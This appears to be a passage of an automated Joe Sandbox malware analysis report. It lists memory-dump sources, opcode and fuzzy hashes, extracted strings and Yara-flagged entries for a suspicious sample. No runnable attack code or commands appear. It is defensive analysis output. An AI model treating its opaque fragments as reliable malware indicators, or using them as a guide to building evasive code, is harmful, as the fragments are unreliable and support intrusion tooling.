                                                                • Instruction ID: 6bb265527da45e89a24210c55409dd48f9a8a8ebe6c64c85ba73b0202358dcbc
                                                                • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                • Instruction Fuzzy Hash:
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                • API String ID: 48624451-2108815105
                                                                Strings
                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05644725
                                                                • ExecuteOptions, xrefs: 056446A0
                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 05644787
                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05644742
                                                                • Execute=1, xrefs: 05644713
                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05644655
                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 056446FC
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                • API String ID: 0-484625025
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-$0$0
                                                                • API String ID: 1302938615-699404926
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$[$]:%u
                                                                • API String ID: 48624451-2819853543
                                                                Strings
                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 056402E7
                                                                • RTL: Re-Waiting, xrefs: 0564031E
                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 056402BD
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                • API String ID: 0-2474120054
                                                                Strings
                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 05647B7F
                                                                • RTL: Resource at %p, xrefs: 05647B8E
                                                                • RTL: Re-Waiting, xrefs: 05647BAC
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 0-871070163
                                                                APIs
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0564728C
                                                                Strings
                                                                • RTL: Resource at %p, xrefs: 056472A3
                                                                • RTL: Re-Waiting, xrefs: 056472C1
                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 05647294
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                • API String ID: 885266447-605551621
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: %%%u$]:%u
                                                                • API String ID: 48624451-3050659472
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID: __aulldvrm
                                                                • String ID: +$-
                                                                • API String ID: 1302938615-2137968064
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 055A0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_4_2_55a0000_vbc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $$@
                                                                • API String ID: 0-1194432280
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $0$5R$6\$=9$D$F$J\$U5$Y&$ZU$_[{"$oq$w}${"$||$3$5$~
                                                                • API String ID: 0-2464818932
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$O$S$\$s
                                                                • API String ID: 0-3854637164
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: d-
                                                                • API String ID: 0-93839401
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: cA
                                                                • API String ID: 0-248667037
                                                                • Instruction Fuzzy Hash: E6311AB5A00209AFDB14DF98DC80EEFB7F8EF88300F108159F919A7244D774A915DBA1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5f20b0c6393750c1a0928c21d242e486ecf576198f3d8ab8148a85e2a8d7be87
                                                                • Instruction ID: 9e7ffafba8c675ec45f4252eeb857dc76a5bff30ddce8823659bef58b88c8ad6
                                                                • Opcode Fuzzy Hash: 5f20b0c6393750c1a0928c21d242e486ecf576198f3d8ab8148a85e2a8d7be87
                                                                • Instruction Fuzzy Hash: 662171B5A00209AFDB10DF98CC41EAF77B8EF89310F008119F9199B280D730A955DBA1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 224f97d8b584d8ece18ef602284019da6f21870f821f25b4b45a50294f1ec274
                                                                • Instruction ID: d7bb87470a76fe367ea248fd0225348c2445260c3b7d1de52ee97396ec981d91
                                                                • Opcode Fuzzy Hash: 224f97d8b584d8ece18ef602284019da6f21870f821f25b4b45a50294f1ec274
                                                                • Instruction Fuzzy Hash: 4A1173B63803057AF720DE599C42FAB776C9B85B10F244055FB04EE2C1D6A5F82176B4
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4bd0d06a1dc33b176a05e257a9af5308c900f38fd26bf33bd733c7588e0c99ff
                                                                • Instruction ID: 888e69c0e8d2d9673fdc6e4add65505fbf3ace8fa5e4b9cb2edf126191ae77fc
                                                                • Opcode Fuzzy Hash: 4bd0d06a1dc33b176a05e257a9af5308c900f38fd26bf33bd733c7588e0c99ff
                                                                • Instruction Fuzzy Hash: A81193755003056FD720EF58CC41FEB77A8EF89710F008559FA29EB280E7706915DBA5
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8ade7bd7113b58eb1ee63fb40ecb9d0bc84f714e973d9395c80dd23fc9621c50
                                                                • Instruction ID: ef70cadb7a9488f450ba13a7458600572d27ed04bd88ac7a272d98d0788ba406
                                                                • Opcode Fuzzy Hash: 8ade7bd7113b58eb1ee63fb40ecb9d0bc84f714e973d9395c80dd23fc9621c50
                                                                • Instruction Fuzzy Hash: CD11D0B59003156BD720EF68CC41FFB77ACEB89710F008159FA69AB280EB306914DBA1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9ae1974cf0f25f75d9c30045ea54f8297eff4901c07f74355625a24245199fe0
                                                                • Instruction ID: 1b4e5ddb77ace489a7f8f84d30c357888b6147a94e2cebb09c92af096f6d242e
                                                                • Opcode Fuzzy Hash: 9ae1974cf0f25f75d9c30045ea54f8297eff4901c07f74355625a24245199fe0
                                                                • Instruction Fuzzy Hash: 9D21F1B6D01219AF9B00DFA9D9419EFB7F9EF48210F04816AE919E7200E7705A15CFE1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 636b85313c04b41502c9f95272d90aac27abd10d0702741c2a568a481b734b23
                                                                • Instruction ID: e3d64c964a6fe91c8618024d2ce057fad049adc34e8bc26c3831fbaebad78def
                                                                • Opcode Fuzzy Hash: 636b85313c04b41502c9f95272d90aac27abd10d0702741c2a568a481b734b23
                                                                • Instruction Fuzzy Hash: 3F018CB6214208BBCB44DE99DC81EEB77ADAF8C714F019218BA19E7240D630F851CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a6f8736e579270ab7af874274cda68e4f5f2ff9a2b5d5e931fc9966d70b547e1
                                                                • Instruction ID: 451f8defb177ddfb2ebd22acea7aa9c2a2cca2828209c0c906d6c67b2e481324
                                                                • Opcode Fuzzy Hash: a6f8736e579270ab7af874274cda68e4f5f2ff9a2b5d5e931fc9966d70b547e1
                                                                • Instruction Fuzzy Hash: 09F05077B042529BE7149A6DAC80746F7DCFB44234F280272FD1DCA142E731D05583A0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 573853c3480624c764de1df28af929791091bac488f8e81bed615b05531ed1af
                                                                • Instruction ID: fba9b999430e6bbe119f2126b6de4c396fa378c1c68787d58339d1b2af37eb20
                                                                • Opcode Fuzzy Hash: 573853c3480624c764de1df28af929791091bac488f8e81bed615b05531ed1af
                                                                • Instruction Fuzzy Hash: FFF02472C042165FCB148F388C4458AFBA5EF8563872A0769ED98AB291DB32940EC7C1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d19de56618783150215f26f8a282ff0388f631ebbe235c922366bb00cc18049d
                                                                • Instruction ID: fa255ce7b3bc24323bae0f3face88359b3c65a11847527f6966b46a4038146c2
                                                                • Opcode Fuzzy Hash: d19de56618783150215f26f8a282ff0388f631ebbe235c922366bb00cc18049d
                                                                • Instruction Fuzzy Hash: C3F0F675C043586EEF10DBB4CC88EEE7B78EF89310F040299F809EB040E67059949B96
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 617cd22e6b6a34ec65addd53948aaddb8ccd67f069f23fcd3a96f297356efafb
                                                                • Instruction ID: 9728f63c8ff06602a736be7d3ddc7abf38c052398b66824b98e62268dc148ad0
                                                                • Opcode Fuzzy Hash: 617cd22e6b6a34ec65addd53948aaddb8ccd67f069f23fcd3a96f297356efafb
                                                                • Instruction Fuzzy Hash: 7FF01CB92002047FD710EE99DC41EEB77ADEF89610F008019BA1CEB241D670B9218BB4
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7fe3a8c3556c84ae845fe426c7cde924dbfabda77256b0d23c8b72b37fdbb06f
                                                                • Instruction ID: d1c2327be255852259c581411d7556ca2e0fc1ef345f171e4c4a77fa122a5f30
                                                                • Opcode Fuzzy Hash: 7fe3a8c3556c84ae845fe426c7cde924dbfabda77256b0d23c8b72b37fdbb06f
                                                                • Instruction Fuzzy Hash: AFE09AB62003087BDA20EE98DC41EEB37ACEFC9710F009019FA18AB241D631BC10CBB5
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 635468598e55e387c89dd8fd0cbc0f637a36babdce7f99ddbe059ba385194d59
                                                                • Instruction ID: d11c1d3946c162f0141efc48b965853fd0670acf906a94d1943a45bca581b383
                                                                • Opcode Fuzzy Hash: 635468598e55e387c89dd8fd0cbc0f637a36babdce7f99ddbe059ba385194d59
                                                                • Instruction Fuzzy Hash: 30F08275C0520CEBDB14CFA4D841BDDBBB8EB04320F1083A9E829DB2C0D63597649B81
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 32e2990ebe8dee4a45d7da2e22c1acb704560b351d746083a571c284ddf6c09e
                                                                • Instruction ID: 0dbc7b202f0e76d44911ea6ed2f1db48d0d36d7565f9cada19939eeb4e834466
                                                                • Opcode Fuzzy Hash: 32e2990ebe8dee4a45d7da2e22c1acb704560b351d746083a571c284ddf6c09e
                                                                • Instruction Fuzzy Hash: 08E04F7660132437D620B999DC09FABB79C8BC2A64F0900A5FE09DF345E5A0AA2066E4
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 53f763a2d87228db95e5af0c3939b1860b050437a5eb3830eef20bcffe050933
                                                                • Instruction ID: 9cfe5fba032b25f09068e78c636c9d06910bef299087e6543d9d9a0a79d0c0f5
                                                                • Opcode Fuzzy Hash: 53f763a2d87228db95e5af0c3939b1860b050437a5eb3830eef20bcffe050933
                                                                • Instruction Fuzzy Hash: 2DE04F352012047BD610EA99DC00F97779CDBC5714F049025FA1DAB140C670791587B1
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 261a47b6ae10ce8f977b5027f9e83ce7e817b21a9b37d4eb50fdc1e5b2942b80
                                                                • Instruction ID: a623ba812c8520163f4f3ba5cde920221612376dc73109a0447753660c60fcb0
                                                                • Opcode Fuzzy Hash: 261a47b6ae10ce8f977b5027f9e83ce7e817b21a9b37d4eb50fdc1e5b2942b80
                                                                • Instruction Fuzzy Hash: 23B0120BAB080409CA40F0E140500508746C0D602E33830F48325CC04ECD6808DF1411
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24204a26689ede587203a801f0e0aa658f28e328e1f884f4b5458883865017f1
                                                                • Instruction ID: 64f67932c46535999afad5ed9415c7f7495f290a57c04650bfa1ead2b692376f
                                                                • Opcode Fuzzy Hash: 24204a26689ede587203a801f0e0aa658f28e328e1f884f4b5458883865017f1
                                                                • Instruction Fuzzy Hash: 47B012F51343415C8892B3C0C2C1C113D028E4D1257104FB066116F14AB3AC41DC2A96
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                • API String ID: 0-3248090998
                                                                • Opcode ID: f109504eb7fe7e88d7bef276a28fe50900439b2dc789d111f4b3c09ff02015ab
                                                                • Instruction ID: 93bda415f3b16d4c67fd990a690f1249ef85995ac6c56a8b02448f48522fde74
                                                                • Opcode Fuzzy Hash: f109504eb7fe7e88d7bef276a28fe50900439b2dc789d111f4b3c09ff02015ab
                                                                • Instruction Fuzzy Hash: 35910EF08042A98ACB118F55A4603DFBF71BB85304F1581E9C6AA7B243C3BE4E95DF90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $0$5R$6\$=9$D$J\$U5$Y&$ZU$_[$oq$w}${"$||$3$5$~
                                                                • API String ID: 0-438648855
                                                                • Opcode ID: f4f3c355bf1ecc5c8f1d6cf63e6352b61e90c86aaf0b0d8e47d659620b49b4a6
                                                                • Instruction ID: a6128ad2b3961b6509e68ee87cbfa7416a0ebf45208b9ecde30971320292a69d
                                                                • Opcode Fuzzy Hash: f4f3c355bf1ecc5c8f1d6cf63e6352b61e90c86aaf0b0d8e47d659620b49b4a6
                                                                • Instruction Fuzzy Hash: 177136B0C0566DCBEB24CF81C9987DEBBB1BB05309F1081D9C1597B281D7BA1A89CF95
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                • API String ID: 0-392141074
                                                                • Opcode ID: c6fa3f486a6035e4b703431666d268efd7c6b0e97352d1fda24d2f90ff93585e
                                                                • Instruction ID: 366a66b4ae528b4088e27de1665ece5fe8afd29364cce18e7051d043ffbd3006
                                                                • Opcode Fuzzy Hash: c6fa3f486a6035e4b703431666d268efd7c6b0e97352d1fda24d2f90ff93585e
                                                                • Instruction Fuzzy Hash: 44711CB6810318AADB15EFA4CC45FEEB7B8BF08700F048199E519EA140E7715758EFA1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                • API String ID: 0-685823316
                                                                • Opcode ID: 0c859f648e394344282c07f566fc7a0cba51972bfe6b65adda37046c97aa06c0
                                                                • Instruction ID: b2cb61b3de72d4c9863edd8620a7a43395442b52bb11ed84ad402716ffe6b45f
                                                                • Opcode Fuzzy Hash: 0c859f648e394344282c07f566fc7a0cba51972bfe6b65adda37046c97aa06c0
                                                                • Instruction Fuzzy Hash: C631B4B5D40318AEEF40DFE4CC45FEEBBB9AF08704F00415DE618BA180DBB556488BA4
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $29j$42:>$42:>$54?%$5>&"$==0~$Q$q#'k$xq=8
                                                                • API String ID: 0-1720297634
                                                                • Opcode ID: fa1c553fc24ef0aa9595641ab2843cb7c387c6ad0b74b8fd8b8815f6ee2c12a7
                                                                • Instruction ID: ffe696021d91f7b5561447fef37e9a2ade60e9ea99d41eac3deb7c1ddeb7ca66
                                                                • Opcode Fuzzy Hash: fa1c553fc24ef0aa9595641ab2843cb7c387c6ad0b74b8fd8b8815f6ee2c12a7
                                                                • Instruction Fuzzy Hash: 502188B1C0528C9FCF10CFE8E981AEEFF75AB05210F608299E945AB350D33656558B65
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ($,$D$H$S$[$f$o$}
                                                                • API String ID: 0-3110972140
                                                                • Opcode ID: 0967492584da7daf509b638183941454a553a284ab4eaf0d21c259cd8e46a154
                                                                • Instruction ID: 7494243b663e388f953ccddbceb0bd3ac51a1238ed5cb6b0b576ea34e65d8b2a
                                                                • Opcode Fuzzy Hash: 0967492584da7daf509b638183941454a553a284ab4eaf0d21c259cd8e46a154
                                                                • Instruction Fuzzy Hash: D811DE10D087CADDDB12C7BC84187AEBFB15F13224F0882D8D5F52B2D2D279460AC7A6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.4133228412.0000000003870000.00000040.00000001.00040000.00000000.sdmp, Offset: 03870000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_3870000_uFLByAWAOFbhtV.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .$P$e$i$m$o$r$x
                                                                • API String ID: 0-620024284
                                                                • Opcode ID: e752167e4e8beae1464322c55aef79bd864ddd90fd03d90b3823827b66b243ea
                                                                • Instruction ID: fd40f2ca1181414bf73c75a53b13f2c71de0a2c28b48c76b7ecc5081d5e9c2b8
                                                                • Opcode Fuzzy Hash: e752167e4e8beae1464322c55aef79bd864ddd90fd03d90b3823827b66b243ea
